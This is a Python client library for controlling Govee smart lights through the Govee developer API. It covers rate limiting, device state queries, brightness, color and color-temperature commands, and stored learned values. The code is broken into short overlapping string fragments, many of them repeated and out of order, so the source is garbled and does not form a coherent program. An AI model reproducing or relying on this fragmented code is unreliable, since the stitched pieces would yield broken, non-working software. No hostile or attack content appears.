prop in json_obj[\"data\"][\"properties\"]: # somehow these", "\"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0:", "GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device", "return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate", "re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key:", "raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on = val @property", "handles: - rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay() try:", "device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on", "= None if not device: err = f\"Invalid device {device_str}, {device}\" else: if", "bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int source: str", "history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from cache:", "with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response", "with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result = await response.json() timestamp", "False # effenctive state # defaults by some conditions if not is_retrievable: learned_get_brightness_max", "def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" # do we", "# learning option prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None", "prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif 
\"colorTemInKelvin\" in prop: prop_color_temp =", "0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else:", "\"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response):", "storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we", "# return the async content manager response yield response except aiohttp.ClientError as ex:", "limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at which the current rate", "in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0,", "learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned, and learn if (", "green > 255: err = f\"set_color: invalid value {color}, green must be within", "= \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async def set_brightness(", "\"\"\" device: str model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str]", "learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off", "self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API", "window resets in UTC epoch seconds. 
# return state from hisory for n", "= err_msg status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \"", "else: red = color[0] green = color[1] blue = color[2] if red <", "_control( self, device: Union[str, GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]:", "fire an event on change.\"\"\" if self._online != online: self._online = online #", "response: if response.status == 200: timestamp = self._utcnow() json_obj = await response.json() prop_online", "self._get_device(device) return device @property def online(self): \"\"\"Last request was able to connect to", "\"Rate-Limit-Remaining\" # The number of requests remaining in the current rate limit window.", "return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str,", "_LOGGER.info( \"brightness range for %s is assumed. If the brightness slider doesn't match", "( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await", "\"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in", "): _LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max,", "= \"Rate-Limit-Remaining\" # The number of requests remaining in the current rate limit", "model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if device_str in", "limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're", "elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\"", "2000-9000\" else: command = \"colorTem\" result, err = await self._control(device, command, color_temp) if", "= 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up", "= True 
learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def", "> 100 ): device.learned_get_brightness_max = ( 100 # assumption, as we didn't get", "get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device)", "self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int) -> int: \"\"\"Get", "try: self._limit = int(response.headers[_RATELIMIT_TOTAL]) self._limit_remaining = int(response.headers[_RATELIMIT_REMAINING]) self._limit_reset = float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit", "wait.\"\"\" seconds_lock = utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0", "DTO. returns: device_address, device_dto \"\"\" device_str = device if isinstance(device, GoveeDevice): device_str =", "0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set >", "prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"],", "online: bool): \"\"\"Set the online state and fire an event on change.\"\"\" if", "self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return", "if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device) if not err: success", "254\" else: command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue}", "err, ) self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None return", "\"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state,", "get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate 
limiting.\"\"\"", "if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success,", "the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self):", "_API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\"", "\"\"\"Turn off a device, return success and error message.\"\"\" return await self._turn(device, \"off\")", "= color_temp return success, err async def set_color( self, device: Union[str, GoveeDevice], color:", "= f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\")", "device %s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] = state", "err = ( f\"set_color: invalid value {color}, red must be within 0 ..", "( f\"set_color: invalid value {color}, red must be within 0 .. 254\" )", "typing import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION", "str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool", "self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific", "be tuple with (r, g, b) values\" else: red = color[0] green =", "exceeded, check if other devices also utilize the govee API\" ) limit_unknown =", "from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed =", "brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0:", "time again. 
self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *,", "seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked}", "have requests left? if self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep?", "if response.status == 200: timestamp = self._utcnow() json_obj = await response.json() prop_online =", "elif not command in device.support_cmds: err = f\"Command {command} not possible on device", "rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds", "processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None", "{device_str}, {device}\" else: if brightness < 0 or brightness > 254: err =", "seconds when the rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self):", "0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one", "= False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp = 0", "error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off:", "calls that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter", "{color}, blue must be within 0 .. 
254\" else: command = \"color\" command_color", "if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if", "result = None err = None if not device: err = f\"Invalid device", "for device %s: %s\", device_str, err, ) self._devices[device_str].error = err else: self._devices[device_str] =", "from dataclasses import dataclass from datetime import datetime from events import Events from", "device_str = device if isinstance(device, GoveeDevice): device_str = device.device if not device_str in", "Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False err", "_api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles: - rate-limiting", "# disallow unknown devices elif isinstance(device, str) and device_str in self._devices: device =", "response: if response.status == 200: device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until", "the brightness up to max once.\", device.device, ) changed = True learning_infos[ device.device", "result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp", "brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err = await", "remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception as ex:", "err async def _learn(self, device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[", "import aiohttp from govee_api_laggat.__version__ import VERSION from govee_api_laggat.learning_storage import ( GoveeAbstractLearningStorage, GoveeLearnedInfo, )", "val > self._limit: raise GoveeError( f\"Rate limiter threshold {val} must be below {self._limit}\"", ") _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" 
_API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES", "result = await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async", ") await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from this", "value {brightness}, allowed range 0 .. 254\" else: if brightness > 0 and", ") if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed. If", "bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {}", "with one element if \"online\" in prop: prop_online = prop[\"online\"] is True elif", "f\"set_color: invalid value {color}, must be tuple with (r, g, b) values\" else:", "elif green < 0 or green > 255: err = f\"set_color: invalid value", "def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool,", "dataclass from datetime import datetime from events import Events from typing import Any,", "GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn on a device, return success and error message.\"\"\"", "async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until", "= learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create", "not prop_online: if self.config_offline_is_off is not None: # global option if self.config_offline_is_off: prop_power_state", "# do we have requests left? 
if self.rate_limit_remaining <= self.rate_limit_on: # do we", "= True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses", "color temperature to 2000-9000.\"\"\" success = False err = None device_str, device =", "GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return device @property def", "reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate", "to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls,", "below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must", "learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] =", "== 200: result = await response.json() timestamp = self._utcnow() learning_infos = await self._learning_storage._read_cached()", "{} self._rate_limit_on = 5 # safe available call count for multiple processes self._limit", "bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int", "def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {}", "-> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device)", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if len(color) !=", "room for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the", "need to re-learn every time again. 
self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create(", "> 255: err = f\"set_color: invalid value {color}, green must be within 0", "else: if brightness < 0 or brightness > 254: err = f\"set_brightness: invalid", "_is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if it is a", "Tuple[int, int, int] color_temp: int timestamp: int source: str error: str lock_set_until: int", "DTO \"\"\" device: str model: str device_name: str controllable: bool retrievable: bool support_cmds:", "{json_obj}, resulting state object: {result}\" ) else: errText = await response.text() err =", "config_offline_is_off=config_offline_is_off ) else: result = await response.text() err = f\"API-Error {response.status}: {result}\" #", "number of requests remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\"", "9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command =", "rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow()", "limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers and _RATELIMIT_REMAINING in response.headers and", "__aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session = None", "f\"API-Result wrong: {result}\" else: result = await response.text() err = f\"API-Error {response.status}: {result}\"", "= self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit}", "also utilize the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in", "auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get(", "with request_lambda() as response: self._set_online(True) # we got something, so we are online", "limit will be reset.\"\"\" return self._limit_reset - 
self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls", "math from contextlib import asynccontextmanager from dataclasses import dataclass from datetime import datetime", "err = \"error from aiohttp: %s\" % repr(ex) except Exception as ex: err", "error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str, GoveeDevice]) ->", ") limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate", "item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True, power_state=False, brightness=0, color=(0, 0,", "something, so we are online self._track_rate_limit(response) # return the async content manager response", "{color}, red must be within 0 .. 254\" ) elif green < 0", "254 await self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "cache: {result}, next state for {device.device} from api allowed in {seconds_locked} seconds\" )", "= {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status", "= ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS )", "import logging import time import math from contextlib import asynccontextmanager from dataclasses import", "+ err) def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return", "{command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while", "success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state =", "return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if 
response.status == 429: _LOGGER.warning(", "as offline for device in self.devices: device.online = False async def check_connection(self) ->", "f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or color_temp > 9000:", "else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\" return result, err", "+ \"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE", "status \"\"\" err = None await self.rate_limit_delay() try: async with request_lambda() as response:", "from learning, or False by default. False: an offline device doesn't change power", "command = \"turn\" params = onOff result, err = await self._control(device, command, params)", "int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config, possibly overridden", "device = self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else:", "to return state, return 'history' state self._devices[device_str].source = \"history\" result = self._devices[device_str] elif", "is shown as off. 
\"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]:", "for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def", "lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _,", "self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5 #", "on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked =", "from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object returned from", "= brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness", "= 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not", "json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element if \"online\" in", "err = None async with self._api_get(url=_API_PING, auth=False) as response: result = await response.text()", "* 1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1,", "if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source =", "power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max,", "0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err = await", ") -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success = False err", "limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded, check if other devices", "and 
device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work if we don't sleep await", "_LOGGER.warning(\"error getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error = err", "while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked", "from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str) if", "source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on:", "0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254))", "cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status", "if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100", "auth=False) as response: result = await response.text() delay = int((time.time() - start) *", "= await response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices result", "config_offline_is_off: bool # this is the learning config, possibly overridden by a global", "not device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000", "lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text() err", "err = f\"set_brightness: invalid value {brightness}, allowed range 0 .. 
254\" else: if", "\"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] = await", "the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\"", "+ \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The", "support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int color:", "default. False: an offline device doesn't change power state. True: an offline device", "0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 )", "when rate limiting is active.\"\"\" # do we have requests left? if self.rate_limit_remaining", "%s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max", "# load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max =", "control within n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class", "lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device)", "learning_infos: Dict[ str, GoveeLearnedInfo ] = await self._learning_storage._read_cached() changed = False # init", "Tuple[bool, str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err = None device_str,", "@property def config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def", "self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\"", "> 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command", "API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager 
enter.\"\"\" self._session = aiohttp.ClientSession() return", "await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "prop_color_temp result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned", "self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get", "global config class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is", "API rate limit header keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of", "err = f\"API-Result wrong: {result}\" else: result = await response.text() err = f\"API-Error", "support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int color: Tuple[int, int,", "not self._learning_storage: # use an internal learning storage as long as we run.", "else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an", "= prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is", "within 0 .. 
254\" elif blue < 0 or blue > 255: err", "self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def _get_device_state( self, device:", "result, err = await self._control(device, command, command_color) if not err: success = self._is_success_result_message(result)", "govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def", "{device_str}\" elif not device.retrievable: # device {device_str} isn't able to return state, return", "100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max = 254 await self._learn(device)", "lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response: yield response @asynccontextmanager async", "\"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__(", "self._session.close() self._session = None def __init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] =", "unknown devices elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else:", "work brightness_set = brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control( device,", "color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success =", "None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid", "False by default. False: an offline device doesn't change power state. 
True: an", "device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100", "config, possibly overridden by a global config class GoveeError(Exception): \"\"\"Base Exception thrown from", "with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp = self._utcnow() json_obj", "= None self._learning_storage = learning_storage if not self._learning_storage: # use an internal learning", "await self._learning_storage._read_cached() changed = False # init Dict and entry for device if", "{device_str} isn't able to return state, return 'history' state self._devices[device_str].source = \"history\" result", "-> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device = self._get_device(device) cmd", "before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice(", "work if we don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set", "brightness brightness_result = brightness_set brightness_set_100 = 0 if brightness_set > 0: brightness_set_100 =", "bool support_brightness: bool support_color: bool support_color_tem: bool online: bool power_state: bool brightness: int", "with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online =", "_LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\" _API_DEVICES =", "config_offline_is_off(self): \"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val:", "command = \"colorTem\" result, err = await self._control(device, command, color_temp) if not err:", "= f\"Invalid device {device_str}, {device}\" else: if len(color) != 
3: err = f\"set_color:", "device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ):", "online: bool power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp:", "False except Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if", "@property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time", "event on change.\"\"\" if self._online != online: self._online = online # inform about", "_LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await", "counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\"", "self.turn_on(device) # api doesn't work if we don't sleep await asyncio.sleep(1) # set", "datetime import datetime from events import Events from typing import Any, List, Optional,", "utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if", "= prop_power_state result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp =", "_LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not", "@asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\"", "asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with", "\"\"\"Rate limit is counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self):", "prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = 
prop[\"brightness\"]", "requests remaining in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The", "200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err = f\"API-Result", "be in range 0-255 \"\"\" success = False err = None device_str, device", "f\"set_color: invalid value {color}, blue must be within 0 .. 254\" else: command", "self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state", "\" + err) def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\"", "Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want to use this", "from aiohttp: %s\" % repr(ex) except Exception as ex: err = \"unknown error:", "self._session: await self._session.close() self._session = None def __init__( self, api_key: str, *, learning_storage:", "Tuple[bool, str]: \"\"\"Set color (r, g, b) where each value may be in", "= 0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice], command: str,", "device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice", "= prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source =", "self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining,", "params=params ) ) as response: yield response @asynccontextmanager async def _api_request_internal(self, request_lambda): \"\"\"API", "def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result checks if it is", "device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def", "if learning_infos == None: learning_infos = {} if 
